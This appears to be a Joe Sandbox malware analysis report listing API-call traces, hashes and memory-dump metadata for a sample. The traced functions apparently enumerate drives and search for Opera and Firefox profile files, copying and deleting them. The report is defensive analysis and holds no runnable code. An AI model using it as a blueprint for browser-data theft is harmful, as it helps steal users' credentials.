                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateReadmemset
                                      • String ID: (
                                      • API String ID: 1041758820-3887548279
                                      • Opcode ID: 2046ffb001da37487cd0db9ef7da6cda2268e22851e5182a2ef8cef2b77ae3af
                                      • Instruction ID: 49c1512ca63b7fe8e92a06e30ac416bed9e2dd52b1e531d3e7b8133ea3a6c3f3
                                      • Opcode Fuzzy Hash: 2046ffb001da37487cd0db9ef7da6cda2268e22851e5182a2ef8cef2b77ae3af
                                      • Instruction Fuzzy Hash: 295173B5A10209AFDB20CFA4DC85FAAB7B9FF48714F108519FA09E7290D774B815CB94
                                      APIs
                                      • wsprintfA.USER32 ref: 003056DF
                                      • FindFirstFileA.KERNEL32(?,?), ref: 003056F6
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 0030571C
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 00305736
                                      • lstrcat.KERNEL32(?,02F431A8), ref: 00305774
                                      • lstrcat.KERNEL32(?,02F43188), ref: 00305788
                                      • lstrcat.KERNEL32(?,?), ref: 0030579C
                                      • lstrcat.KERNEL32(?,?), ref: 003057AA
                                      • lstrcat.KERNEL32(?,003101E0), ref: 003057BC
                                      • lstrcat.KERNEL32(?,?), ref: 003057D0
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 00305863
                                      • FindClose.KERNEL32(00000000), ref: 00305872
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpywsprintf
                                      • String ID: %s\%s
                                      • API String ID: 1833283839-4073750446
                                      • Opcode ID: 34801624abdd832f61dc10f32b1532abf688765ace642f374e34f9ddc27c691d
                                      • Instruction ID: adb1db75ac2e6cfe0abb2259ee302709cc96c9ce5a278d99a9c7f3a485bf1950
                                      • Opcode Fuzzy Hash: 34801624abdd832f61dc10f32b1532abf688765ace642f374e34f9ddc27c691d
                                      • Instruction Fuzzy Hash: 4541BAB551120CABDB29EB70DD99EFE737CAF54700F0485A8FA0592091EB709B49CF61
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,003101E9), ref: 002FA322
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 002FA34C
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 002FA366
                                      • StrCmpCA.SHLWAPI(00000000,Opera,003101E9,003101E9,003101E9,003101E9,003101E9,003101E9,003101E9), ref: 002FA3DD
                                      • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 002FA3F1
                                      • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 002FA405
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 00300D10: GetFileAttributesA.KERNEL32(00000000,?,?,002F1774,?,?,?,003101E9), ref: 00300D1D
                                        • Part of subcall function 002F9D40: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,003101E9), ref: 002F9D8B
                                        • Part of subcall function 002F9D40: StrCmpCA.SHLWAPI(?,003101DC), ref: 002F9DAE
                                        • Part of subcall function 002F9D40: StrCmpCA.SHLWAPI(?,003101D8), ref: 002F9DC8
                                      • FindNextFileA.KERNEL32(?,?), ref: 002FA984
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$File$Find$Firstlstrcat$AttributesNextlstrlen
                                      • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                      • API String ID: 3824151033-1710495004
                                      • Opcode ID: e312d0cebb034a6f380600ffe975b97518e1251105716368c565adcb7c4ff5ce
                                      • Instruction ID: a95d30b7b4815c59133138c9a14bb7ebdd0f680996ec2837bd7460ae77511ef1
                                      • Opcode Fuzzy Hash: e312d0cebb034a6f380600ffe975b97518e1251105716368c565adcb7c4ff5ce
                                      • Instruction Fuzzy Hash: 9E12347192010C6BDB59FB70DE66EFDB378AF54780F404178F60662291EF70AA68CE61
                                      APIs
                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 0030541D
                                      • memset.MSVCRT ref: 0030543E
                                      • GetDriveTypeA.KERNEL32(00000000), ref: 00305447
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00305466
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00305484
                                      • lstrcpy.KERNEL32(?,00000000), ref: 003054A7
                                      • lstrlen.KERNEL32(00000000), ref: 0030550E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
                                      • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                      • API String ID: 1884655365-147700698
                                      • Opcode ID: f9d1ad991903f08d82108c21125a16cbe802c1ddafaf9f12a5ef7edf03c1a257
                                      • Instruction ID: b595b03306df3303b3a5d6b7f43fe58cd4436b38642cc9b82a41f5177c3bd5d5
                                      • Opcode Fuzzy Hash: f9d1ad991903f08d82108c21125a16cbe802c1ddafaf9f12a5ef7edf03c1a257
                                      • Instruction Fuzzy Hash: 4D519E71510208ABDB75EF30CD96FFE736CAF54740F548024FA0A6A292DF70AA59CB61
                                      APIs
                                      • wsprintfA.USER32 ref: 002FAAD0
                                      • FindFirstFileA.KERNEL32(?,?), ref: 002FAAE7
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 002FAB0C
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 002FAB26
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • lstrlen.KERNEL32(00000000,003101E9,00000000,?,?,?,003101E0,?,?,003101E9), ref: 002FABB6
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                      • DeleteFileA.KERNEL32(00000000,00000000,?,02F45090,?,?,?,003101E0,?,00000000,?,02F43308), ref: 002FAE58
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FAE72
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 002FAF64
                                      • FindClose.KERNEL32(00000000), ref: 002FAF73
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSleepSystemThreadTimeWaitwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 309841800-1013718255
                                      • Opcode ID: 7c6c7847df3b77c663ea4b972478af236543b496aa0119504b73a42c7240b211
                                      • Instruction ID: 28eef67b0024c8b9fc86cf21b386a92e55e7a94f07ac828387a502ac6bb4d16e
                                      • Opcode Fuzzy Hash: 7c6c7847df3b77c663ea4b972478af236543b496aa0119504b73a42c7240b211
                                      • Instruction Fuzzy Hash: 23E1137282010CAADB59FB60DD56EFDB338AF54780F404279F60662191EF706B68CF61
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003134C0,003101E9), ref: 002FB3F2
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 002FB41C
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 002FB436
                                      • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,003101E0,?,?,003101E9), ref: 002FB4B0
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FB562
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FB59A
                                      • DeleteFileA.KERNEL32(00000000), ref: 002FB63E
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 003010F0: memset.MSVCRT ref: 0030110A
                                        • Part of subcall function 003010F0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,002F727B,?), ref: 0030113D
                                        • Part of subcall function 003010F0: RtlAllocateHeap.NTDLL(00000000), ref: 00301144
                                        • Part of subcall function 003010F0: wsprintfW.USER32 ref: 00301153
                                        • Part of subcall function 003010F0: OpenProcess.KERNEL32(00001001,00000000), ref: 003011BB
                                        • Part of subcall function 003010F0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003011CA
                                        • Part of subcall function 003010F0: CloseHandle.KERNEL32(00000000), ref: 003011D1
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 002FB6F5
                                      • FindClose.KERNEL32(00000000), ref: 002FB704
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$FindProcess$CloseCopyHeaplstrcat$AllocateDeleteFirstHandleNextOpenSystemTerminateTimelstrlenmemsetwsprintf
                                      • String ID: prefs.js
                                      • API String ID: 155253302-3783873740
                                      • Opcode ID: 5d5a1a51b5cca7467a90e0a8d0dee4beddae530387431583fe7bef00ebb36f4f
                                      • Instruction ID: adc87d7f9bcf8559556f9347dc5503655973bf802b7881b52bace7289d7fd3d5
                                      • Opcode Fuzzy Hash: 5d5a1a51b5cca7467a90e0a8d0dee4beddae530387431583fe7bef00ebb36f4f
                                      • Instruction Fuzzy Hash: DBA1427192010DABDB58FB70DD569FDB778AF54380F408138EA05A3291EF70AA69CF91
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,003101E9), ref: 002F9D8B
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 002F9DAE
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 002F9DC8
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
